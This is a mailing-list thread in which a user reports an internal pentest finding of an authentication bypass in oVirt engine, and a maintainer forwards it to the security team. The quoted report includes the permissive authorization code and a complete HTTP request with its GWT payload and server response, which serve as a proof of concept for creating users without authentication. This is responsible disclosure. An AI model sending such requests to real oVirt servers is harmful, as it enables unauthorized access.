[ovirt-users] Re: Internal pentest result : Ovirt-engine authentication bypass

Mon, 15 Jan 2024 11:04:48 -0800 

Thanks for the report Jirka, I forwarded your email to secur...@ovirt.org ;
they'll investigate on your report and get back to you eventually.

Il giorno lun 15 gen 2024 alle ore 10:09 Jirka Simon <ji...@vesim.cz> ha
scritto:

> Hello ovirt comunity.
>
> We had an internal pentest here and one finding is
>
> *Ovirt-engine authentication bypass.*
>
> Ovirt-engine, as deployed on ovirtm.XXX.XXX.cz, contains an
> authentication bypass. It is
>
> possible to directly call the CreateUserSessionCommand using runAction
> exposed by /ovirt-
> engine/webadmin/GenericApiGWTService.
>
> *This action explicitly enables everyone to call it:*
> ```
>
>
>
>
> * @Override protected boolean isUserAuthorizedToRunAction() {     return
> true; } *```
>
> The behavior of this call differs based on the
> ENGINE_SSO_ENABLE_EXTERNAL_SSO configuration
> option:
>
> ```
>
>
>
>
>
> *boolean externalSsoEnabled =
> EngineLocalConfig.getInstance().getBoolean("ENGINE_SSO_ENABLE_EXTERNAL_SSO");
>       DbUser dbUser = externalSsoEnabled ?
> dbUserDao.getByUsernameAndDomain(params.getPrincipalName(), authzName) :
>         dbUserDao.getByExternalId(authzName, params.getPrincipalId());*
>
> ```
>
> If this option is enabled, usernames are used to locate users. If it's
> disabled, the externalId
> (which seems to be a randomly generated GUID) is used to locate users.
> If the specified user exists, a session is returned for the user. If the
> specified user doesn't exist,
> the user is created in the system. However, the user doesn't get assigned
> any group membership
> or rights, therefore the session creation fails because of the missing
> Login right.
> The attempt to modify the users table can be seen in the SQL error message
> when attempting to
> use a null value for the username (as the endpoint uses GWT, the payload
> is mostly unreadable):
>
> ```
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> *POST /ovirt-engine/webadmin/GenericApiGWTService HTTP/1.1 Host:
> ovirtm.xxx.xxx.cz <http://ovirtm.xxx.xxx.cz> 14 Final Report: Results of
> penetration testing (internal, external, Wi-Fi) 21 December 2023 Cookie:
> JSESSIONID=wsp3WAo63LZGHfpB__stEt4lZ7z_zZycpzIprNlT.ovirtm45; Content-Type:
> text/x-gwt-rpc; charset=utf-8 X-GWT-Module-Base:
> https://ovirtm.xxx.xx.cz/ovirt-engine/webadmin
> <https://ovirtm.xxx.xx.cz/ovirt-engine/webadmin> X-GWT-Permutation:
> D7ECB5EF5E29205D18271CC08183A28D Ovirt-Xsrf-Token:
> 4D87D03B631F8506FC668AA4C3FE3F443D723A9F379FDBB8B0D6DA0668650375
> Content-Length: 869 7|0|23|https://ovirtm.xxx.xxx.cz/ovirt
> <https://ovirtm.xxx.xxx.cz/ovirt>-
> engine/webadmin|0D1B4DEE9D1424E18C443F1CD1C11574|org.ovirt.engine.ui.frontend.gwtservices.GenericApiGWT
> Service|runAction|org.ovirt.engine.core.common.action.ActionType/2930387551|org.ovirt.engine.core.commo
> n.action.ActionParametersBase/2903049429|org.ovirt.engine.core.common.action.CreateUserSessionParameter
> s/2744166832|appScope|email|firstName|java.util.ArrayList/4159755760|lastName|namespace|principalId|adm
> in|internal|sourceIp|ssoScope|ssoToken|org.ovirt.engine.core.common.action.ActionParametersBase$EndProc
> edure/1568822488|java.util.Collections$EmptyMap/4174664486|org.ovirt.engine.core.common.businessentitie
> s.VDSStatus/1938301532|org.ovirt.engine.core.compat.TransactionScopeOption/1475850853|1|2|3|4|2|5|6|5|2
> 01|7|0|8|9|10|11|0|12|13|14|0|16|17|18|19|0|5|0|0|0|0|20|1|0|11|0|0|0|0|0|0|21|0|-
> 4|22|0|1|0|1|23|2|0|0|0| HTTP/1.1 200 OK Date: Fri, 15 Dec 2023 09:42:35
> GMT Server: Apache/2.4.37 (CentOS Stream) OpenSSL/1.1.1k
> mod_auth_gssapi/1.6.1 Expires: Thu, 14 Dec 2023 09:42:35 GMT Cache-Control:
> no-cache, no-store, must-revalidate Set-Cookie: locale=cs_CZ; path=/;
> secure; HttpOnly; Max-Age=2147483647; Expires=Wed, 02-Jan-2092 12:56:42 GMT
> X-XSS-PROTECTION: 1; MODE=BLOCK Pragma: no-cache X-FRAME-OPTIONS:
> SAMEORIGIN Content-Disposition: attachment X-CONTENT-TYPE-OPTIONS: NOSNIFF
> Content-Length: 1794 Content-Type: application/json;charset=utf-8
> Correlation-Id: 664c1c1f-9a75-4e14-94d7-aba12c5442f5 Connection: close
> //OK[0,5,4,8,3,1,2,474,7,6,1,0,2,0,2,5,1,0,4,3,1,2,0,2,1,1,["org.ovirt.engine.core.common.action.Action
> ReturnValue/4163585948","java.util.ArrayList/4159755760","java.lang.String/2004016611","ENGINE","","org
> .ovirt.engine.core.common.errors.EngineFault/2377218566","org.ovirt.engine.core.common.errors.EngineErr
> or/2640515959","ERROR: null value in column \"username\" violates not-null
> constraint\n Detail: Failing row contains
> (6dad5e2f-7c95-4547-8f08-6936494c91b6, firstName, lastName, internal-authz,
> null, , email, , f, principalId, 2023-12-14 17:51:04.757747+01, 2023-12-15
> 10:42:35.125994+01, namespace, firstName@internal-authz).\n Where: SQL
> statement \"UPDATE users\n SET department \u003D v_department,\n domain
> \u003D v_domain,\n email \u003D v_email,\n name \u003D v_name,\n note
> \u003D v_note,\n surname \u003D v_surname,\n username \u003D v_username,\n
> external_id \u003D v_external_id,\n namespace \u003D v_namespace,\n
> _update_date \u003D CURRENT_TIMESTAMP\n WHERE external_id \u003D
> v_external_id\n AND domain \u003D v_domain\"\nPL/pgSQL function
> updateuserimpl(character varying,character varying,character
> varying,character varying,character varying,character
> varying,uuid,character varying,text,character varying) line 5 at SQL
> statement\nSQL statement \"SELECT UpdateUserImpl(\n v_department,\n
> v_domain,\n v_email,\n v_name,\n v_note,\n v_surname,\n v_user_id,\n
> v_username,\n v_external_id,\n v_namespace)\"\nPL/pgSQL function
> updateuser(character varying,character varying,character varying,character
> varying,character varying,character varying,uuid,character
> varying,boolean,text,character varying) line 3 at PERFORM"],0,7]*
>
> ```
>
> Fortunately, in our deplyoment the ENGINE_SSO_ENABLE_EXTERNAL_SSO
> configuration was
> set to false, so to create a session for the admin it would be necessary
> to know the admin's user
> externalId. However, as this is not the default configuration, it is
> possible that a later
> reinstallation could change the value. Still, it was possible to create
> users in the system without
> any authentication.
>
>
> What is the best way to report this security issue?
>
> Thank you
>
> Jirka
>
>
> _______________________________________________
> Users mailing list -- users@ovirt.org
> To unsubscribe send an email to users-le...@ovirt.org
> Privacy Statement: https://www.ovirt.org/privacy-policy.html
> oVirt Code of Conduct:
> https://www.ovirt.org/community/about/community-guidelines/
> List Archives:
> https://lists.ovirt.org/archives/list/users@ovirt.org/message/HG33VD56KZZQKCJDXIAB667J4HIHH2DQ/
>


-- 

Sandro Bonazzola

MANAGER, SOFTWARE ENGINEERING

Red Hat In-Vehicle Operating System

Red Hat EMEA <https://www.redhat.com/>
<https://www.redhat.com/>

*Red Hat respects your work life balance. Therefore there is no need to
answer this email out of your office hours.*

_______________________________________________
Users mailing list -- users@ovirt.org
To unsubscribe send an email to users-le...@ovirt.org
Privacy Statement: https://www.ovirt.org/privacy-policy.html
oVirt Code of Conduct: 
https://www.ovirt.org/community/about/community-guidelines/
List Archives: 
https://lists.ovirt.org/archives/list/users@ovirt.org/message/AODJU5QSXYUCVYAXP34W2YYNTN7JKWKG/

Reply via email to